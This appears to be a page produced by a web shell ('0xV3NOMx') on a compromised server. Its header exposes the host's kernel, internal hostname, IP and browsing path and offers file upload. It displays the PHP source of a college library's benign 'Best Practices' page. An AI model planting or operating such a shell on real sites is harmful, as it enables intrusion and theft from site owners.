0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.116.85.111


Current Path : /proc/thread-self/root/proc/self/root/kop/
Upload File :
Current File : //proc/thread-self/root/proc/self/root/kop/lib_practices.php

<!DOCTYPE html>
<html lang="en">
  <?php
  include("header.php")
  ?>


  <body>
  <div class="row_1">
        <div class="column_1" style="padding-bottom: 15px;">
      <div class="col-xs-12 col-sm-4 col-md-3 col-lg-3" style="max-width: 100%; width:210px;">
      <h6 style="color: black;">Library Details</h6>
<hr><a href="lib_collection.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Library Collection </a><br>
<br><a href="lib_access.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Library Access</a><br>
<br><a href="lib_services.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Library Services</a><br>
<br><a href="lib_details.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Books Details</a><br>
<br><a href="lib_program.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> N-LIST Program</a><br>
<br><a href="lib_practices.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Best Practices</a><br>
<br><a href="lib_r&r.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Rules and Regulations</a><br>
<br><a href="lib_Timings.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Library Timings</a><br>
<br><a href="lib_Map.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Library Floor Map</a><br>
<br><a href="lib_con_details.php" style="color: currentcolor; font-weight: 400;"><i style='font-size:24px' class='fa fas'>&#xf105;</i> Contact details</a>



  
</div>
</div>

<!-- <br>
<br> -->



<div class="column_1">
<div class="col-xs-12 col-sm-8 col-md-9 col-lg-9" style="max-width: 100%;">
  
        <h3 class="display-" style=" color: black;">Best Practices</h3>
        <hr>
        <br/>
        <ul class="points" style="font-size: large;text-align: justify;">
      <li>User Education (Information literacy program)</li>
      <li>Students are allowed to borrow books & make use of library services even during examinations.</li>
      <li>Eco-friendly disposal of old books and periodicals.</li>
      <li>Competitive Corner: Competitive exam books are placed in a separate place for easy access.</li>
      <li>BEST USER Award.</li>
      <li>Institutional Repository of Faculty publications along with completed minor and major projects are made available.</li>
      <li>Compact storage of less used collection.</li>
      
</ul>


</div>
</div>




  
</body>
<?php
include("footer.php")
?>
</html>